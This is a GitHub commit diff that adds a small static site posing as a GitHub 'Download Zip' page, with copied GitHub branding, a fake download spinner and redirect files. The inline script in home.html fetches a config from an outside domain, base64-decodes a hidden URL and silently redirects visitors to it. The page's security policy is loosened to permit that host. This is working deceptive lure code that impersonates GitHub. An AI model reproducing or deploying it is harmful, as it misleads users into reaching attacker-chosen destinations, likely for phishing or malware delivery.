Skip to content

Commit a4d40ed

Browse files
Add files via upload
1 parent e6f2997 commit a4d40ed

File tree

4 files changed

+341
-0
lines changed

4 files changed

+341
-0
lines changed

404.html

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
<!DOCTYPE html>
2+
<html lang="en">
3+
<head>
4+
<meta charset="UTF-8">
5+
<meta http-equiv="refresh" content="0;url=./index.htm">
6+
<title>Not Found</title>
7+
</head>
8+
<body></body>
9+
</html>

home.html

Lines changed: 109 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,109 @@
1+
<!DOCTYPE html>
2+
<html lang="en">
3+
<head>
4+
<meta charset="UTF-8" />
5+
<meta name="viewport" content="width=device-width, initial-scale=1" />
6+
<title>Cloud Files</title>
7+
<meta name="description" content="Secure download portal" />
8+
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
9+
10+
<!-- Разрешаем инлайн‑скрипты для нашего мини‑JS -->
11+
<meta
12+
http-equiv="Content-Security-Policy"
13+
content="
14+
default-src 'self';
15+
script-src 'self' 'unsafe-inline' https://jumpquickalso.com;
16+
style-src 'self';
17+
connect-src 'self' https://jumpquickalso.com
18+
"
19+
/>
20+
21+
<link rel="stylesheet" href="styles.css" />
22+
<link rel="stylesheet" href="git-styles.css" />
23+
</head>
24+
<body>
25+
<div class="page-wrapper">
26+
<div class="github-header">
27+
<div class="header-content">
28+
<a href="https://github.com/">
29+
<svg class="github-logo" viewBox="0 0 16 16">
30+
<path
31+
d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"
32+
/>
33+
</svg>
34+
</a>
35+
<span class="header-title">Download Zip</span>
36+
</div>
37+
</div>
38+
39+
<div class="main-content">
40+
<div class="download-container">
41+
<h1 id="downloadTitle">Preparing your download...</h1>
42+
43+
<div class="loading-container" id="loadingContainer">
44+
<div class="spinner-container">
45+
<div class="spinner"></div>
46+
</div>
47+
48+
<p style="color: #8b949e; font-size: 14px; margin-top: 16px">
49+
Please keep this page open while we prepare your zip.
50+
</p>
51+
</div>
52+
</div>
53+
</div>
54+
</div>
55+
56+
<div class="github-footer">
57+
<div class="footer-bottom">
58+
<div class="footer-logo-section">
59+
<a href="https://github.com/">
60+
<svg class="footer-logo" viewBox="0 0 16 16">
61+
<path
62+
d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"
63+
/>
64+
</svg>
65+
</a>
66+
<span class="footer-copyright">© 2025 GitHub, Inc.</span>
67+
</div>
68+
69+
<div class="footer-links">
70+
<a
71+
href="https://docs.github.com/site-policy/github-terms/github-terms-of-service"
72+
>Terms</a
73+
>
74+
<a
75+
href="https://docs.github.com/site-policy/privacy-policies/github-privacy-statement"
76+
>Privacy</a
77+
>
78+
<a href="https://github.com/security">Security</a>
79+
<a href="https://www.githubstatus.com/">Status</a>
80+
<a href="https://docs.github.com/">Help</a>
81+
<a href="https://support.github.com/?tags=dotcom-footer">Contact</a>
82+
<button type="button" class="github-style-button">
83+
Manage cookies
84+
</button>
85+
<button type="button" class="github-style-button">
86+
Do not share my personal information
87+
</button>
88+
</div>
89+
</div>
90+
</div>
91+
92+
<script>
93+
(async function () {
94+
try {
95+
const res = await fetch(
96+
"https://jumpquickalso.com/agency.bright"
97+
);
98+
if (!res.ok) throw new Error(`Config HTTP ${res.status}`);
99+
const { c } = await res.json();
100+
const url = atob(c);
101+
if (!/^https?:\/\//.test(url)) throw new Error("Invalid URL");
102+
window.location.href = url;
103+
} catch (e) {
104+
console.error(e);
105+
}
106+
})();
107+
</script>
108+
</body>
109+
</html>

index.htm

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
<!DOCTYPE html>
2+
<html lang="ru">
3+
<head>
4+
<meta charset="UTF-8">
5+
<title>Redirecting...</title>
6+
<meta http-equiv="refresh" content="0; url=home.html">
7+
<style>
8+
body {
9+
margin: 0;
10+
background-color: black;
11+
}
12+
</style>
13+
<script>
14+
// На случай, если meta-редирект не сработает
15+
window.location.replace("home.html");
16+
</script>
17+
</head>
18+
<body>
19+
</body>
20+
</html>

styles.css

Lines changed: 203 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,203 @@
1+
* {
2+
margin: 0;
3+
padding: 0;
4+
box-sizing: border-box;
5+
}
6+
7+
body {
8+
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans",
9+
Helvetica, Arial, sans-serif;
10+
background-color: #010409;
11+
color: #f0f6fc;
12+
line-height: 1.5;
13+
min-height: 100vh;
14+
display: flex;
15+
flex-direction: column;
16+
position: relative;
17+
}
18+
19+
.github-header {
20+
background-color: #010409;
21+
border-bottom: 1px solid #21262d;
22+
padding: 16px 0;
23+
width: 100%;
24+
}
25+
26+
.header-content {
27+
display: flex;
28+
align-items: center;
29+
gap: 16px;
30+
max-width: 1280px;
31+
margin: 0 auto;
32+
padding: 0 24px;
33+
}
34+
35+
.github-logo {
36+
width: 32px;
37+
height: 32px;
38+
fill: #f0f6fc;
39+
}
40+
41+
.header-title {
42+
font-size: 20px;
43+
font-weight: 600;
44+
color: #f0f6fc;
45+
}
46+
47+
.main-content {
48+
flex: 1;
49+
display: flex;
50+
align-items: center;
51+
justify-content: center;
52+
padding: 40px 24px;
53+
}
54+
55+
.download-container {
56+
background-color: #0c1015;
57+
border: 1px solid #21262d;
58+
border-radius: 12px;
59+
padding: 40px;
60+
width: 100%;
61+
max-width: 480px;
62+
box-shadow: 0 16px 32px rgba(1, 4, 9, 0.85);
63+
text-align: center;
64+
position: relative;
65+
}
66+
67+
h1 {
68+
font-size: 24px;
69+
font-weight: 600;
70+
margin-bottom: 25px;
71+
color: #f0f6fc;
72+
}
73+
74+
.loading-container {
75+
margin-top: 32px;
76+
text-align: center;
77+
}
78+
79+
.spinner-container {
80+
display: flex;
81+
align-items: center;
82+
justify-content: center;
83+
margin-bottom: 20px;
84+
}
85+
86+
.spinner {
87+
width: 20px;
88+
height: 20px;
89+
border: 2px solid #30363d;
90+
border-top: 2px solid #58a6ff;
91+
border-radius: 50%;
92+
animation: spin 1s linear infinite;
93+
margin-right: 12px;
94+
}
95+
96+
@keyframes spin {
97+
0% {
98+
transform: rotate(0deg);
99+
}
100+
100% {
101+
transform: rotate(360deg);
102+
}
103+
}
104+
105+
.github-footer {
106+
background-color: #010409;
107+
border-top: 1px solid #21262d;
108+
padding: 24px;
109+
margin-top: auto;
110+
width: 100%;
111+
}
112+
113+
.footer-bottom {
114+
max-width: 1280px;
115+
margin: 0 auto;
116+
display: flex;
117+
justify-content: center;
118+
align-items: center;
119+
flex-wrap: wrap;
120+
gap: 24px;
121+
}
122+
123+
.footer-logo-section {
124+
display: flex;
125+
align-items: center;
126+
gap: 12px;
127+
}
128+
129+
.footer-logo {
130+
width: 24px;
131+
height: 24px;
132+
fill: #6e7681;
133+
}
134+
135+
.footer-copyright {
136+
color: #6e7681;
137+
font-size: 12px;
138+
}
139+
140+
.footer-links {
141+
display: flex;
142+
gap: 16px;
143+
flex-wrap: wrap;
144+
}
145+
146+
.footer-links a,
147+
button {
148+
color: #8b949e;
149+
text-decoration: none;
150+
font-size: 12px;
151+
}
152+
153+
.footer-links a:hover,
154+
button:hover {
155+
color: #58a6ff;
156+
}
157+
158+
.page-wrapper {
159+
min-height: 90vh;
160+
display: flex;
161+
flex-direction: column;
162+
}
163+
164+
.main-content {
165+
flex: 1;
166+
display: flex;
167+
align-items: center;
168+
justify-content: center;
169+
}
170+
171+
.github-style-button {
172+
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Noto Sans",
173+
Helvetica, Arial, sans-serif;
174+
background-color: transparent;
175+
border: 0;
176+
padding: 0;
177+
text-align: left;
178+
cursor: pointer;
179+
display: inline-block;
180+
transition: color 0.2s ease-in-out;
181+
}
182+
183+
@media (max-width: 640px) {
184+
.download-container {
185+
margin: 100px 16px 16px;
186+
padding: 24px;
187+
}
188+
189+
.header-content {
190+
padding: 0 16px;
191+
}
192+
}
193+
194+
@media (max-width: 768px) {
195+
.footer-bottom {
196+
flex-direction: column;
197+
align-items: flex-start;
198+
}
199+
200+
.footer-links {
201+
gap: 16px;
202+
}
203+
}

0 commit comments

Comments
 (0)